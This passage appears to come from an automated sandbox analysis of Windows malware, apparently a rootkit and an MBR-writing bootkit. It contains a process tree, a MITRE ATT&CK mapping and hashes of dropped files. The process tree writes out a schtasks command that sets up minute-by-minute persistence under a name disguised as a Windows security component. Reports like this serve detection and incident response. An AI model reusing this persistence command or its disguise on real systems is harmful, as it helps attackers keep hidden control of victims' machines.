- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5812 -
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\ProgramData\MasonRootkit.exe"C:\ProgramData\MasonRootkit.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4F82.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1404
-
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:5672
-
-
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Credential Guard & VBS Key Isolation" /tr "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1832
-
-
C:\Users\Admin\AppData\Local\Temp\Knuckles.exe"C:\Users\Admin\AppData\Local\Temp\Knuckles.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:1780
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:764
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3680
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3888
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4052
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4212
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1928
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4668
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4304
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:5784
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5272
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:1216
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4544
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe c5a60895ff4132ccfd0b08264de66424 nUIOEranYkSEqrTGCPSI7Q.0.1.0.0.01⤵
- Sets service image path in registry
PID:5144 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3968
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3036
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3548
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:5868
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3708
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:828
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3288
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:5652
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1880
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:5156
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
3Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
596KB
MD5bb2fd6c1b233fd2f08a6a43ef860bcb6
SHA11cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04
SHA2568c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce
SHA5122ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5
-
Filesize
5KB
MD5cfa15d48af384510f69cdc66cc4bbbc1
SHA1fc9d90052c0d2f8efa12e89ccb9fd469d569a01e
SHA2568a1b4471575c8e690629164847ce42f8c213d8654328430a56ca2b9243256c85
SHA512bb343d592a5c650ea962b0bb8446dcf1c3b86d2b913141f6df7a7d99516a7084c375e0e4006ce35f39268c58cd46a6fc527aaf5bbc36be68a7e917128cef298d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Credential Guard & VBS Key Isolation.exe.log
Filesize654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
1KB
MD53982d6d16fd43ae609fd495bb33433a2
SHA16c33cd681fdfd9a844a3128602455a768e348765
SHA2569a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9
SHA5124b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa
-
Filesize
289KB
MD57e9d3109b138c0a67be983159fbbde98
SHA1012308407fada7ecb5edfe4e067fa4d18acba424
SHA2561f98a3f8852d28ed3b2f64e529c1ae1eafc5ef942a962ec89163f3db2744c8a4
SHA512ac6a5a4ec87fe8770c1903f62d181f94366b2f9b3d3a4e8a04ec7f25b9e9d026762efc96ba5883474b9d1c2d0cca4a99e12f0343f6eac51af12d628a926a5e12
-
Filesize
612KB
MD55e1eb1a67d40ccae40dee2a037ca6c64
SHA1786b54d3d451ea40faeeb20fd30a38744862eeb5
SHA25680e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f
SHA5120484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
109KB
MD5402ab9dba30645bfd7cd8eba83af0b7d
SHA120ef5a12bb03156bb1af43b42680de2e9bcf8dc1
SHA256e70ac6965ab4ea166b8661e5d5baedd65f834fa91d169a35983842fff9c595e1
SHA5124ab2e0a8aa12a3cb94b895cf7c48a72af7bbdf17dbf44f88308a6d0d5a6b53043be0df0322ba4c2dd4da41ce46acf6127c3852f622a1374a916d25d6d762118a
-
Filesize
164B
MD55f56fcfbe0f611f4c99092d830523f6f
SHA17b44fb81ceaac1d405733071d371ea115cbcec74
SHA25605ab894843daaccefcc521a18719adb0c2715dc7d84ad90cc0a803a9d9355da4
SHA51211d301d25e05ccbd8b22da29321bfba7afeea59af0d51262f3870013ee140e001f6e2342d1ace28261fc93bbfcfbdb392c1badb3ab5ded9f5647774786abeaa5
-
Filesize
109KB
MD57ccccd0ddf864a061e175cf9e5114a46
SHA1c0b798cd725d5f270f347790e2ad13dab60108e3
SHA256fe74cb06318fd7451fed5ad5ce5605bb746bb5ef55da3fe96f52ba20e159db49
SHA5128ad1bb6375e7f35e0dc41353d2e79499285cc401c412ea16fdbb123c3a53aef315186f594364a4f4156a58fa780c973bbc7e0202e6a1ed8380742b6c45058132
-
Filesize
109KB
MD52fbabf9d3c366285411f7737ce52d7f5
SHA18c1632ed6f5f42dd7295311c59c1bd029dfc8210
SHA256025d6d5074d20a7ff75e59ed38abbb915b9c68c7efaca9ab767f76fa7e2e3c91
SHA5124925c585f735353ef6235556db94a0d90ca98ba8e617543fd6210510ccfb5034d3fea9349c5ab8805dd212ee918d4557d08723bd8f7d3ced94910006a54e457e
-
Filesize
109KB
MD5a7ad997ed7aa116038104ebaeea2c315
SHA14a9c9a2d4b246b870fb0987024a0cc2315dee269
SHA25643a34da4ebddc1cea35ae1b0fb5f547a750ab2f0001f521deac45600c16e40ac
SHA5122dc0cf8b545d3ef60033b9149abcffadd1e7f085046583282d7deb7c09bd5ffd7da50f1e43716bc2cc0e4208b32c7ebe3053823a8489c38954f4da409ab338f5
-
Filesize
109KB
MD54c0a6177be784adde84a2e3ef3c4232a
SHA188e0a2b97e3f2849e455242df6b03670e964b36b
SHA256a2ab32275c79e025c7b1d7df26603392cfb2606c42d70ee68bccabe490e17c6b
SHA5121abc273b6abf24fa19f2afc6211138eb6251aedbd9a35c3731f6ba3716fbd7e68abe9d5eb167a7ce94ac8f863e26a06ed219a57a13cdc2cc6f5bc12481dd892e
-
Filesize
55KB
MD5dac20ddb2cfb3cb89ce5bcd907c796df
SHA184ec40d9a683ed62a25f8e1e570b0a2ee3987af0
SHA2569a727d5cfc4c67cb0d3c0f8195087042fd04b83bb29cbe0c0439a4094a2adfc7
SHA5125a3199f76bc18eb20a1e9e7d0bdbadbff3deaa06ec00b3aee33360f1497cc22ae0bc1a125aeaadcef1647c5f03cb386bfbc62375ca5e70ac57c01168043c8762
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4